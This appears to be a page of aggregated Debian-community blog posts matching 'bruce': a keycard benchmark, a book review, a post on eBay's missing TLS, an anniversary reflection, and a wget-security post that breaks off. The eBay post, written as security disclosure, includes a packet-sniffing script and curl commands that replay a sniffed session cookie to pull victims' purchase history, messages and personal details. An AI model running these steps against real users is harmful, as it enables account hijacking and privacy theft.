Search Results: "bruce"

17 October 2017

Antoine Beaupr : A comparison of cryptographic keycards

An earlier article showed that private key storage is an important problem to solve in any cryptographic system and established keycards as a good way to store private key material offline. But which keycard should we use? This article examines the form factor, openness, and performance of four keycards to try to help readers choose the one that will fit their needs. I have personally been using a YubiKey NEO, since a 2015 announcement on GitHub promoting two-factor authentication. I was also able to hook up my SSH authentication key into the YubiKey's 2048 bit RSA slot. It seemed natural to move the other subkeys onto the keycard, provided that performance was sufficient. The mail client that I use, (Notmuch), blocks when decrypting messages, which could be a serious problems on large email threads from encrypted mailing lists. So I built a test harness and got access to some more keycards: I bought a FST-01 from its creator, Yutaka Niibe, at the last DebConf and Nitrokey donated a Nitrokey Pro. I also bought a YubiKey 4 when I got the NEO. There are of course other keycards out there, but those are the ones I could get my hands on. You'll notice none of those keycards have a physical keypad to enter passwords, so they are all vulnerable to keyloggers that could extract the key's PIN. Keep in mind, however, that even with the PIN, an attacker could only ask the keycard to decrypt or sign material but not extract the key that is protected by the card's firmware.

Form factor The Nitrokey Pro, YubiKey NEO (worn out), YubiKey 4, and FST-01 The four keycards have similar form factors: they all connect to a standard USB port, although both YubiKey keycards have a capacitive button by which the user triggers two-factor authentication and the YubiKey 4 can also require a button press to confirm private key use. The YubiKeys feel sturdier than the other two. The NEO has withstood two years of punishment in my pockets along with the rest of my "real" keyring and there is only minimal wear on the keycard in the picture. It's also thinner so it fits well on the keyring. The FST-01 stands out from the other two with its minimal design. Out of the box, the FST-01 comes without a case, so the circuitry is exposed. This is deliberate: one of its goals is to be as transparent as possible, both in terms of software and hardware design and you definitely get that feeling at the physical level. Unfortunately, that does mean it feels more brittle than other models: I wouldn't carry it in my pocket all the time, although there is a case that may protect the key a little better, but it does not provide an easy way to hook it into a keyring. In the group picture above, the FST-01 is the pink plastic thing, which is a rubbery casing I received along with the device when I got it. Notice how the USB connectors of the YubiKeys differ from the other two: while the FST-01 and the Nitrokey have standard USB connectors, the YubiKey has only a "half-connector", which is what makes it thinner than the other two. The "Nano" form factor takes this even further and almost disappears in the USB port. Unfortunately, this arrangement means the YubiKey NEO often comes loose and falls out of the USB port, especially when connected to a laptop. On my workstation, however, it usually stays put even with my whole keyring hanging off of it. I suspect this adds more strain to the host's USB port but that's a tradeoff I've lived with without any noticeable wear so far. Finally, the NEO has this peculiar feature of supporting NFC for certain operations, as LWN previously covered, but I haven't used that feature yet. The Nitrokey Pro looks like a normal USB key, in contrast with the other two devices. It does feel a little brittle when compared with the YubiKey, although only time will tell how much of a beating it can take. It has a small ring in the case so it is possible to carry it directly on your keyring, but I would be worried the cap would come off eventually. Nitrokey devices are also two times thicker than the Yubico models which makes them less convenient to carry around on keyrings.

Open and closed designs The FST-01 is as open as hardware comes, down to the PCB design available as KiCad files in this Git repository. The software running on the card is the Gnuk firmware that implements the OpenPGP card protocol, but you can also get it with firmware implementing a true random number generator (TRNG) called NeuG (pronounced "noisy"); the device is programmable through a standard Serial Wire Debug (SWD) port. The Nitrokey Start model also runs the Gnuk firmware. However, the Nitrokey website announces only ECC and RSA 2048-bit support for the Start, while the FST-01 also supports RSA-4096. Nitrokey's founder Jan Suhr, in a private email, explained that this is because "Gnuk doesn't support RSA-3072 or larger at a reasonable speed". Its devices (the Pro, Start, and HSM models) use a similar chip to the FST-01: the STM32F103 microcontroller. Nitrokey Pro with STM32F103TBU6 MCU Nitrokey also publishes its hardware designs, on GitHub, which shows the Pro is basically a fork of the FST-01, according to the ChangeLog. I opened the case to confirm it was using the STM MCU, something I should warn you against; I broke one of the pins holding it together when opening it so now it's even more fragile. But at least, I was able to confirm it was built using the STM32F103TBU6 MCU, like the FST-01. Nitrokey back side But this is where the comparison ends: on the back side, we find a SIM card reader that holds the OpenPGP card that, in turn, holds the private key material and does the cryptographic operations. So, in effect, the Nitrokey Pro is really a evolution of the original OpenPGP card readers. Nitrokey confirmed the OpenPGP card featured in the Pro is the same as the one shipped by the Free Software Foundation Europe (FSFE): the BasicCard built by ZeitControl. Those cards, however, are covered by NDAs and the firmware is only partially open source. This makes the Nitrokey Pro less open than the FST-01, but that's an inevitable tradeoff when choosing a design based on the OpenPGP cards, which Suhr described to me as "pretty proprietary". There are other keycards out there, however, for example the SLJ52GDL150-150k smartcard suggested by Debian developer Yves-Alexis Perez, which he prefers as it is certified by French and German authorities. In that blog post, he also said he was experimenting with the GPL-licensed OpenPGP applet implemented by the French ANSSI. But the YubiKey devices are even further away in the closed-design direction. Both the hardware designs and firmware are proprietary. The YubiKey NEO, for example, cannot be upgraded at all, even though it is based on an open firmware. According to Yubico's FAQ, this is due to "best security practices": "There is a 'no upgrade' policy for our devices since nothing, including malware, can write to the firmware." I find this decision questionable in a context where security updates are often more important than trying to design a bulletproof design, which may simply be impossible. And the YubiKey NEO did suffer from critical security issue that allowed attackers to bypass the PIN protection on the card, which raises the question of the actual protection of the private key material on those cards. According to Niibe, "some OpenPGP cards store the private key unencrypted. It is a common attitude for many smartcard implementations", which was confirmed by Suhr: "the private key is protected by hardware mechanisms which prevent its extraction and misuse". He is referring to the use of tamper resistance. After that security issue, there was no other option for YubiKey NEO users than to get a new keycard (for free, thankfully) from Yubico, which also meant discarding the private key material on the key. For OpenPGP keys, this may mean having to bootstrap the web of trust from scratch if the keycard was responsible for the main certification key. But at least the NEO is running free software based on the OpenPGP card applet and the source is still available on GitHub. The YubiKey 4, on the other hand, is now closed source, which was controversial when the new model was announced last year. It led the main Linux Foundation system administrator, Konstantin Ryabitsev, to withdraw his endorsement of Yubico products. In response, Yubico argued that this approach was essential to the security of its devices, which are now based on "a secure chip, which has built-in countermeasures to mitigate a long list of attacks". In particular, it claims that:
A commercial-grade AVR or ARM controller is unfit to be used in a security product. In most cases, these controllers are easy to attack, from breaking in via a debug/JTAG/TAP port to probing memory contents. Various forms of fault injection and side-channel analysis are possible, sometimes allowing for a complete key recovery in a shockingly short period of time.
While I understand those concerns, they eventually come down to the trust you have in an organization. Not only do we have to trust Yubico, but also hardware manufacturers and designs they have chosen. Every step in the hidden supply chain is then trusted to make correct technical decisions and not introduce any backdoors. History, unfortunately, is not on Yubico's side: Snowden revealed the example of RSA security accepting what renowned cryptographer Bruce Schneier described as a "bribe" from the NSA to weaken its ECC implementation, by using the presumably backdoored Dual_EC_DRBG algorithm. What makes Yubico or its suppliers so different from RSA Security? Remember that RSA Security used to be an adamant opponent to the degradation of encryption standards, campaigning against the Clipper chip in the first crypto wars. Even if we trust the Yubico supply chain, how can we trust a closed design using what basically amounts to security through obscurity? Publicly auditable designs are an important tradition in cryptography, and that principle shouldn't stop when software is frozen into silicon. In fact, a critical vulnerability called ROCA disclosed recently affects closed "smartcards" like the YubiKey 4 and allows full private key recovery from the public key if the key was generated on a vulnerable keycard. When speaking with Ars Technica, the researchers outlined the importance of open designs and questioned the reliability of certification:
Our work highlights the dangers of keeping the design secret and the implementation closed-source, even if both are thoroughly analyzed and certified by experts. The lack of public information causes a delay in the discovery of flaws (and hinders the process of checking for them), thereby increasing the number of already deployed and affected devices at the time of detection.
This issue with open hardware designs seems to be recurring topic of conversation on the Gnuk mailing list. For example, there was a discussion in September 2017 regarding possible hardware vulnerabilities in the STM MCU that would allow extraction of encrypted key material from the key. Niibe referred to a talk presented at the WOOT 17 workshop, where Johannes Obermaier and Stefan Tatschner, from the Fraunhofer Institute, demonstrated attacks against the STMF0 family MCUs. It is still unclear if those attacks also apply to the older STMF1 design used in the FST-01, however. Furthermore, extracted private key material is still protected by user passphrase, but the Gnuk uses a weak key derivation function, so brute-forcing attacks may be possible. Fortunately, there is work in progress to make GnuPG hash the passphrase before sending it to the keycard, which should make such attacks harder if not completely pointless. When asked about the Yubico claims in a private email, Niibe did recognize that "it is true that there are more weak points in general purpose implementations than special implementations". During the last DebConf in Montreal, Niibe explained:
If you don't trust me, you should not buy from me. Source code availability is only a single factor: someone can maliciously replace the firmware to enable advanced attacks.
Niibe recommends to "build the firmware yourself", also saying the design of the FST-01 uses normal hardware that "everyone can replicate". Those advantages are hard to deny for a cryptographic system: using more generic components makes it harder for hostile parties to mount targeted attacks. A counter-argument here is that it can be difficult for a regular user to audit such designs, let alone physically build the device from scratch but, in a mailing list discussion, Debian developer Ian Jackson explained that:
You don't need to be able to validate it personally. The thing spooks most hate is discovery. Backdooring supposedly-free hardware is harder (more costly) because it comes with greater risk of discovery. To put it concretely: if they backdoor all of them, someone (not necessarily you) might notice. (Backdooring only yours involves messing with the shipping arrangements and so on, and supposes that you specifically are of interest.)
Since that, as far as we know, the STM microcontrollers are not backdoored, I would tend to favor those devices instead of proprietary ones, as such a backdoor would be more easily detectable than in a closed design. Even though physical attacks may be possible against those microcontrollers, in the end, if an attacker has physical access to a keycard, I consider the key compromised, even if it has the best chip on the market. In our email exchange, Niibe argued that "when a token is lost, it is better to revoke keys, even if the token is considered secure enough". So like any other device, physical compromise of tokens may mean compromise of the key and should trigger key-revocation procedures.

Algorithms and performance To establish reliable performance results, I wrote a benchmark program naively called crypto-bench that could produce comparable results between the different keys. The program takes each algorithm/keycard combination and runs 1000 decryptions of a 16-byte file (one AES-128 block) using GnuPG, after priming it to get the password cached. I assume the overhead of GnuPG calls to be negligible, as it should be the same across all tokens, so comparisons are possible. AES encryption is constant across all tests as it is always performed on the host and fast enough to be irrelevant in the tests. I used the following:
  • Intel(R) Core(TM) i3-6100U CPU @ 2.30GHz running Debian 9 ("stretch"/stable amd64), using GnuPG 2.1.18-6 (from the stable Debian package)
  • Nitrokey Pro 0.8 (latest firmware)
  • FST-01, running Gnuk version 1.2.5 (latest firmware)
  • YubiKey NEO OpenPGP applet 1.0.10 (not upgradable)
  • YubiKey 4 4.2.6 (not upgradable)
I ran crypto-bench for each keycard, which resulted in the following:
Algorithm Device Mean time (s)
ECDH-Curve25519 CPU 0.036
FST-01 0.135
RSA-2048 CPU 0.016
YubiKey-4 0.162
Nitrokey-Pro 0.610
YubiKey-NEO 0.736
FST-01 1.265
RSA-4096 CPU 0.043
YubiKey-4 0.875
Nitrokey-Pro 3.150
FST-01 8.218
Decryption graph There we see the performance of the four keycards I tested, compared with the same operations done without a keycard: the "CPU" device. That provides the baseline time of GnuPG decrypting the file. The first obvious observation is that using a keycard is slower: in the best scenario (FST-01 + ECC) we see a four-fold slowdown, but in the worst case (also FST-01, but RSA-4096), we see a catastrophic 200-fold slowdown. When I presented the results on the Gnuk mailing list, GnuPG developer Werner Koch confirmed those "numbers are as expected":
With a crypto chip RSA is much faster. By design the Gnuk can't be as fast - it is just a simple MCU. However, using Curve25519 Gnuk is really fast.
And yes, the FST-01 is really fast at doing ECC, but it's also the only keycard that handles ECC in my tests; the Nitrokey Start and Nitrokey HSM should support it as well, but I haven't been able to test those devices. Also note that the YubiKey NEO doesn't support RSA-4096 at all, so we can only compare RSA-2048 across keycards. We should note, however, that ECC is slower than RSA on the CPU, which suggests the Gnuk ECC implementation used by the FST-01 is exceptionally fast. In discussions about improving the performance of the FST-01, Niibe estimated the user tolerance threshold to be "2 seconds decryption time". In a new design using the STM32L432 microcontroller, Aurelien Jarno was able to bring the numbers for RSA-2048 decryption from 1.27s down to 0.65s, and for RSA-4096, from 8.22s down to 3.87s seconds. RSA-4096 is still beyond the two-second threshold, but at least it brings the FST-01 close to the YubiKey NEO and Nitrokey Pro performance levels. We should also underline the superior performance of the YubiKey 4: whatever that thing is doing, it's doing it faster than anyone else. It does RSA-4096 faster than the FST-01 does RSA-2048, and almost as fast as the Nitrokey Pro does RSA-2048. We should also note that the Nitrokey Pro also fails to cross the two-second threshold for RSA-4096 decryption. For me, the FST-01's stellar performance with ECC outshines the other devices. Maybe it says more about the efficiency of the algorithm than the FST-01 or Gnuk's design, but it's definitely an interesting avenue for people who want to deploy those modern algorithms. So, in terms of performance, it is clear that both the YubiKey 4 and the FST-01 take the prize in their own areas (RSA and ECC, respectively).

Conclusion In the above presentation, I have evaluated four cryptographic keycards for use with various OpenPGP operations. What the results show is that the only efficient way of storing a 4096-bit encryption key on a keycard would be to use the YubiKey 4. Unfortunately, I do not feel we should put our trust in such closed designs so I would argue you should either stick with 2048-bit encryption subkeys or keep the keys on disk. Considering that losing such a key would be catastrophic, this might be a good approach anyway. You should also consider switching to ECC encryption: even though it may not be supported everywhere, GnuPG supports having multiple encryption subkeys on a keyring: if one algorithm is unsupported (e.g. GnuPG 1.4 doesn't support ECC), it will fall back to a supported algorithm (e.g. RSA). Do not forget your previously encrypted material doesn't magically re-encrypt itself using your new encryption subkey, however. For authentication and signing keys, speed is not such an issue, so I would warmly recommend either the Nitrokey Pro or Start, or the FST-01, depending on whether you want to start experimenting with ECC algorithms. Availability also seems to be an issue for the FST-01. While you can generally get the device when you meet Niibe in person for a few bucks (I bought mine for around \$30 Canadian), the Seeed online shop says the device is out of stock at the time of this writing, even though Jonathan McDowell said that may be inaccurate in a debian-project discussion. Nevertheless, this issue may make the Nitrokey devices more attractive. When deciding on using the Pro or Start, Suhr offered the following advice:
In practice smart card security has been proven to work well (at least if you use a decent smart card). Therefore the Nitrokey Pro should be used for high security cases. If you don't trust the smart card or if Nitrokey Start is just sufficient for you, you can choose that one. This is why we offer both models.
So far, I have created a signing subkey and moved that and my authentication key to the YubiKey NEO, because it's a device I physically trust to keep itself together in my pockets and I was already using it. It has served me well so far, especially with its extra features like U2F and HOTP support, which I use frequently. Those features are also available on the Nitrokey Pro, so that may be an alternative if I lose the YubiKey. I will probably move my main certification key to the FST-01 and a LUKS-encrypted USB disk, to keep that certification key offline but backed up on two different devices. As for the encryption key, I'll wait for keycard performance to improve, or simply switch my whole keyring to ECC and use the FST-01 or Nitrokey Start for that purpose.
[The author would like to thank Nitrokey for providing hardware for testing.] This article first appeared in the Linux Weekly News.

1 July 2017

Russ Allbery: Review: Make It Stick

Review: Make It Stick, by Peter C. Brown, et al.
Author: Peter C. Brown
Author: Henry L. Roediger III
Author: Mark A. McDaniel
Publisher: Belknap Press
Copyright: 2014
ISBN: 0-674-72901-3
Format: Kindle
Pages: 255
Another read for the work book club. "People generally are going about learning in the wrong ways." This is the first sentence of the preface of this book by two scientists (Roediger and McDaniel are both psychology researchers specializing in memory) and a novelist and former management consultant (Brown). The goal of Make It Stick is to apply empirical scientific research to the problem of learning, specifically retention of information for long-term use. The authors aim to convince the reader that subjective impressions of the effectiveness of study habits are highly deceptive, and that scientific evidence points strongly towards mildly counter-intuitive learning methods that don't feel like they're producing as good of results. I have such profound mixed feelings about this book. Let's start with the good. Make It Stick is a book containing actual science. The authors quote the studies, results, and scientific argument at length. There are copious footnotes and an index, as well as recommended reading. And the science is concrete and believable, as is the overlaid interpretation based on cognitive and memory research. The book's primary argument is that short-term and long-term memory are very different things, that what we're trying to achieve when we say "learning" is based heavily on long-term memory and recall of facts for an extended time after study, and that building this type of recall requires not letting our short-term memory do all the work. We tend towards study patterns that show obvious short-term improvement and that produce an increased feeling of effortless recall of the material, but those study patterns are training short-term memory and mean the knowledge slips away quickly. Choosing learning methods that instead make us struggle a little with what we're learning are significantly better. It's that struggle that leads to committing the material to long-term memory and building good recall pathways for it. On top of this convincingly-presented foundation, the authors walk through learning methods that feel worse in the moment but have better long-term effects: mixing practice of different related things (different types of solids when doing geometry problems, different pitches in batting practice) and switching types before you've mastered the one you're working on, forcing yourself to interpret and analyze material (such as writing a few paragraphs of summary in your own words) instead of re-reading it, and practicing material at spaced intervals far enough apart that you've forgotten some of the material and have to struggle to recall it. Possibly the most useful insight here (at least for me) was the role of testing in learning, not as just a way of measuring progress, but as a learning tool. Frequent, spaced, cumulative testing forces exactly the type of recall that builds long-term memory. The tests themselves help improve our retention of what we're learning. It's bad news for people like me who were delighted to leave school and not have to take a test again, but viewing tests as a more effective learning tool than re-reading and review (which they are) does cast them in a far more positive light. This is all solid stuff, and I'm very glad the research underlying this book exists and that I now know about it. But there are some significant problems with its presentation. The first is that there just isn't much here. The two long paragraphs above summarize nearly all of the useful content of this book. The authors certainly provide more elaboration, and I haven't talked about all of the study methods they mention or some of the useful examples of their application. But 80% of it is there, and the book is intentionally repetitive (because it tries to follow the authors' advice on learning theory). Make It Stick therefore becomes tedious and boring, particularly in the first four chapters. I was saying a lot of "yes, yes, you said that already" and falling asleep while trying to read it. The summaries at the end of the book are a bit better, but you will probably not need most of this book to get the core ideas. And then there's chapter five, which ends in a train wreck. Chapter five is on cognitive biases, and I see why the authors wanted to include it. The Dunning-Kruger effect is directly relevant to their topic. It undermines our ability to learn, and is yet another thing that testing helps avoid. Their discussion of Daniel Kahneman's two system theory (your fast, automatic, subconscious reactions and your slow, thoughtful, conscious processing) is somewhat less directly relevant, but it's interesting stuff, and it's at least somewhat related to the short-term and long-term memory dichotomy. But some of the stories they choose to use to illustrate this are... deeply unfortunate. Specifically, the authors decided to use US police work in multiple places as their example of choice for two-system thinking, and treat it completely uncritically. Some of you are probably already wincing because you can see where this is going. They interview a cop who, during scenario training for traffic stops, was surprised by the car trunk popping open and a man armed with a shotgun popping out of it. To this day, he still presses down on the trunk of the car as he walks up; it's become part of his checklist for every traffic stop. This would be a good example if the authors realized how badly his training has failed and deconstructed it, but they're apparently oblivious. I wanted to reach into the book and shake them. People have a limited number of things they can track and follow as part of a procedure, and some bad trainer has completely wasted part of this cop's attention in every traffic stop and thereby made him less safe! Just calculate the chances that someone would be curled up in an unlocked trunk with a shotgun and a cop would just happen to stop that car for some random reason, compared to any other threat the cop could use that same attention to watch for. This is exactly the type of scenario that's highly memorable but extremely improbable and therefore badly breaks human risk analysis. It's what Bruce Schneier calls a movie plot threat. The correct reaction to movie plot threats is to ignore them; wasting effort on mitigating them means not having that effort to spend on mitigating some other less memorable but more likely threat. This isn't the worst, though. The worst is the very next paragraph, also from police training, of showing up at a domestic call, seeing an armed person on the porch who stands up and walks away when ordered to drop their weapon, and not being sure how to react, resulting in that person (in the simulated exercise) killing the cop before they did anything. The authors actually use this as an example of how the cop was using system two and needed to train to use system one in that situation to react faster, and that this is part of the point of the training. Those of us who have been paying attention to the real world know what using system one here means: the person on the porch gets shot if they're black and doesn't get shot if they're white. The authors studiously refuse to even hint at this problem. I would have been perfectly happy if this book avoided the unconscious bias aspect of system one thinking. It's a bit far afield of the point of the book, and the authors are doubtless trying to stay apolitical. But that's why you pick some other example. You cannot just drop this kind of thing on the page and then refuse to even comment on it! It's like writing a chapter about the effect of mass transit on economic development, choosing Atlanta as one of your case studies, and then never mentioning race. Also, some editor seriously should have taken an ax to the sentence where the authors (for no justified reason) elaborate a story to describe a cop maiming a person, solely to make a cliched joke about how masculinity is defined by testicles and how people who lose body parts are less human. Thanks, book. This was bad enough that it dominated my memory of this chapter, but, reviewing the book for this review, I see it was just a few badly chosen examples at the end of the chapter and one pointless story at the start. The rest of the chapter is okay, although it largely summarizes things covered better in other books. The most useful part that's relevant to the topic of the book is probably the discussion of peer instruction. Just skip over all the police bits; you won't be missing anything. Thankfully, the rest of the book mostly avoids failing quite this hard. Chapter six does open with the authors obliviously falling for a string of textbook examples of survivorship bias (immediately after the chapter on cognitive biases!), but they shortly thereafter settle down to the accurate and satisfying work of critiquing theories of learning methods and types of intelligence. And by critiquing, I mean pointing out that they're mostly unscientific bullshit, which is fighting the good fight as far as I'm concerned. So, mixed feelings. The science seems solid, and is practical and directly applicable to my life. Make It Stick does an okay job at presenting it, but gets tedious and boring in places, particularly near the beginning. And there are a few train-wreck examples that had me yelling at the book and scribbling notes, which wasn't really the cure for boredom I was looking for. I recommend being aware of this research, and I'm glad the authors wrote this book, but I can't really recommend the book itself as a reading experience. Rating: 6 out of 10

10 December 2016

Iain R. Learmonth: The Internet of Dangerous Auction Sites

It might be that the internet era of fun and games is over, because the internet is now dangerous. Bruce Schneier
Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives Energy & Commerce Committee about computer security after the Dyn attack. I m including this quote because I feel it sets the scene nicely for what follows here. Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately, there s no way that eBay as a global company would be deliberately risking users in this way. I was wrong. There is not and has never been TLS for large swathes of the eBay site. In fact, the only point at which I ve found TLS is in their help pages and when it comes to entering card details (although it ll give you back the last 4 digits of your card over a plaintext channel).
sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser  whoami  wireshark
# Log out and in again to assume the privileges you've granted yourself
What can you see? They first thing I d like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:
We don t store any of your personal information on any of our cookies or other similar technologies.
Well eBay, I don t know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present on her cookie when using her account. But to answer the question, you can see pretty much everything. Using the Observer module of PATHspider, which is essentially a programmable flow meter, let s take a look at what items users of the network are browsing:
sudo apt install pathspider
The following is a Python 3 script that you ll need to run as root (for packet capturing) and will need to kill with ^C when you re done because I didn t give it an exit condition:
import logging
import queue
import threading
import email
import re
from io import StringIO
import plt
from pathspider.observer import Observer
from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete
def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True
def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True
lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item= itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")
o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()
while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))
Note: PATHspider s Observer won t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive. If all is working correctly (if it was really working correctly, it wouldn t be working because the connections would be encrypted, but you get what I mean ), you ll see something like:
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie. This was a very simple example, you can also passively sniff the content of messages sent and recieved on eBay (though I ll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items and then those recommendations would also be available to anyone viewing the traffic at your workplace. Perhaps you want to see the purchase history but you re too impatient to wait for the user to view the purchase history screen. Don t worry, this is also possible. Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay. Yes, it s 2016, nearly 2017, and cookie hijacking is still a thing. You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened. So what is cookie hijacking all about? Let s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:
print(headers['Cookie'])
Now you have the user s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and
sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html
I m sure you can use your imagination for more. One of my favourites is
# Get the personal information
curl --cookie "$COOKIE" http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK > personal.html
This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account. The techniques I ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana s laptop and also tried from a server hosted in the US (our routing origin is in Germany so this should have perhaps been a red flag). I could not find any interface through which I could query my login history, I m not sure what it would have shown. I m not a security researcher, though I do work as an Internet Engineering researcher. I m publishing this as these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time I pointed out to someone that eBay does not use TLS over the last week they were suprised, and often horrified. You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides. You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale. Please Internet, TLS already.

31 October 2016

Steve McIntyre: Twenty years...

So, it's now been twenty years since I became a Debian Developer. I couldn't remember the exact date I signed up, but I decided to do some forensics to find out. First, I can check on the dates on my first Debian system, as I've kept it running as a Debian system ever since!
jack:~$ ls -alt /etc
...
-rw-r--r--   1 root   root     6932 Feb 10  1997 pine.conf.old
-rw-r--r--   1 root   root     6907 Dec 29  1996 pine.conf.old2
-rw-r--r--   1 root   root    76739 Dec  7  1996 mailcap.old
-rw-r--r--   1 root   root     1225 Oct 20  1996 fstab.old
jack:~$
I know that I did my first Debian installation in late October 1996, migrating over from my existing Slackware installation with the help of my friend Jon who was already a DD. That took an entire weekend and it was painful, so much so that several times that weekend I very nearly bailed and went back. But, I stuck with it and after a few more days I decided I was happier with Debian than with the broken old Slackware system I'd been using. That last file (fstab.old) is the old fstab file from the Slackware system, backed up just before I made the switch. I was already a software developer at the time, so of course the first thing I wanted to do once I was happy with Debian was to become a DD and take over the Debian maintenance of mikmod, the module player I was working on at the time. So, I mailed Bruce to ask for an account (there was none of this NM concept back then!) and I think he replied the next day. Unfortunately, I don't have the email in my archives any more due to a disk crash back in the dim and distant past. But I can see that the first PGP key I generated for the sake of joining Debian dates from October 30th 1996 which gives me a date of 31st October 1996 for joining Debian. Twenty years, wow... Since then, I've done lots in the project. I'm lucky enough to been to 11 DebConfs, hosted all around the world. I'm massively proud to have been voted DPL for two of those twenty years. I've worked on a huge number of different things in Debian, from the audio applications I started with to the installer (yay, how things come back to bite you!), from low-level CD and DVD tools (and making our CD images!) to a wiki engine written in python. I've worked hard to help make the best Operating System on the planet, both for my own sake and the sake of our users. Debian has been both excellent fun and occasionally a huge cause of stress in my life for the last 20 years, but despite the latter I wouldn't go back and change anything. Why? Through Debian, I've made some great friends: in Cambridge, in the UK, in Europe, on every continent. Thanks to you all, and here's to (hopefully) many years to come!

2 October 2016

Russell Coker: Hostile Web Sites

I was asked whether it would be safe to open a link in a spam message with wget. So here are some thoughts about wget security and web browser security in general. Wget Overview Some spam messages are designed to attack the recipient s computer. They can exploit bugs in the MUA, applications that may be launched to process attachments (EG MS Office), or a web browser. Wget is a very simple command-line program to download web pages, it doesn t attempt to interpret or display them. As with any network facing software there is a possibility of exploitable bugs in wget. It is theoretically possible for an attacker to have a web server that detects the client and has attacks for multiple HTTP clients including wget. In practice wget is a very simple program and simplicity makes security easier. A large portion of security flaws in web browsers are related to plugins such as flash, rendering the page for display on a GUI system, and javascript features that wget lacks. The Profit Motive An attacker that aims to compromise online banking accounts probably isn t going to bother developing or buying an exploit against wget. The number of potential victims is extremely low and the potential revenue benefit from improving attacks against other web browsers is going to be a lot larger than developing an attack on the small number of people who use wget. In fact the potential revenue increase of targeting the most common Linux web browsers (Iceweasel and Chromium) might still be lower than that of targeting Mac users. However if the attacker doesn t have a profit motive then this may not apply. There are people and organisations who have deliberately attacked sysadmins to gain access to servers (here is an article by Bruce Schneier about the attack on Hacking Team [1]). It is plausible that someone who is targeting a sysadmin could discover that they use wget and then launch a targeted attack against them. But such an attack won t look like regular spam. For more information about targeted attacks Brian Krebs article about CEO scams is worth reading [2]. Privilege Separation If you run wget in a regular Xterm in the same session you use for reading email etc then if there is an exploitable bug in wget then it can be used to access all of your secret data. But it is very easy to run wget from another account. You can run ssh otheraccount@localhost and then run the wget command so that it can t attack you. Don t run su otheraccount as it is possible for a compromised program to escape from that. I think that most Linux distributions have supported a switch user functionality in the X login system for a number of years. So you should be able to lock your session and then change to a session for another user to run potentially dangerous programs. It is also possible to use a separate PC for online banking and other high value operations. A 10yo PC is more than adequate for such tasks so you could just use an old PC that has been replaced for regular use for online banking etc. You could boot it from a CD or DVD if you are particularly paranoid about attack. Browser 